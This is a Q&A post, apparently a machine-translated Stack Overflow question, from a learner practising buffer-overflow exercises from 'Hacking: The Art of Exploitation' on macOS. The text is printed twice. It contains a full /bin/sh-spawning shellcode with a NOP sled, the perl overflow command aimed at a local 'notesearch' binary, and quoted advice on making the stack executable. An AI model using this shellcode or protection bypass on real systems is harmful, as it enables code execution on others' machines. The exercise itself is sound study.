如何使堆栈在 osx 上可执行?
How can you make the stack executable on osx?
我目前正在学习 "Hacking; the Art of Exploitation",并且正在练习编写 shell 我编写的一些示例代码的代码注入。
我正在注入 shell 代码作为环境变量。在 lldb 中,我可以看到我正在覆盖 return 地址,并且 EIP 被设置到我的 NOP sled 的中间。但是,它随后抛出 "EXC_BAD_ACCESS" 和段错误。
这是我的 shell代码的堆栈部分:
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"
调用lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40')执行缓冲区溢出,这是我们在段错误时得到的结果:
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
frame #0: 0xbffffc5e
-> 0xbffffc5e: nop
0xbffffc5f: nop
0xbffffc60: nop
0xbffffc61: nop
我正在使用
gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer
编译代码,我使用 change_mach_o_flags.py script 和 --no-pie 和 --executable-heap 选项集。
我认为问题是osx自动将堆栈设置为不可执行。不幸的是,osx 中似乎没有 gcc 的 -z execstack 选项。也没有 execstack 实用程序可供使用。
我已经在网上搜索过了,但无论如何都找不到让堆栈在我的编译代码中可执行的方法。有没有办法做到这一点,如果有,怎么做?
来自 Apple 开发者文档:
There are two ways to make the stack and heap executable:
Pass the -allow_stack_execute flag to the compiler. This makes the
stack (not the heap) executable.
Use the mprotect system call to mark
specific memory pages as executable. The details are beyond the scope
of this document. For more information, see the manual page for
mprotect.
我目前正在学习 "Hacking; the Art of Exploitation",并且正在练习编写 shell 我编写的一些示例代码的代码注入。
我正在注入 shell 代码作为环境变量。在 lldb 中,我可以看到我正在覆盖 return 地址,并且 EIP 被设置到我的 NOP sled 的中间。但是,它随后抛出 "EXC_BAD_ACCESS" 和段错误。
这是我的 shell代码的堆栈部分:
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"
调用lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40')执行缓冲区溢出,这是我们在段错误时得到的结果:
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
frame #0: 0xbffffc5e
-> 0xbffffc5e: nop
0xbffffc5f: nop
0xbffffc60: nop
0xbffffc61: nop
我正在使用
gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer
编译代码,我使用 change_mach_o_flags.py script 和 --no-pie 和 --executable-heap 选项集。
我认为问题是osx自动将堆栈设置为不可执行。不幸的是,osx 中似乎没有 gcc 的 -z execstack 选项。也没有 execstack 实用程序可供使用。
我已经在网上搜索过了,但无论如何都找不到让堆栈在我的编译代码中可执行的方法。有没有办法做到这一点,如果有,怎么做?
来自 Apple 开发者文档:
There are two ways to make the stack and heap executable:
Pass the -allow_stack_execute flag to the compiler. This makes the stack (not the heap) executable.
Use the mprotect system call to mark specific memory pages as executable. The details are beyond the scope of this document. For more information, see the manual page for mprotect.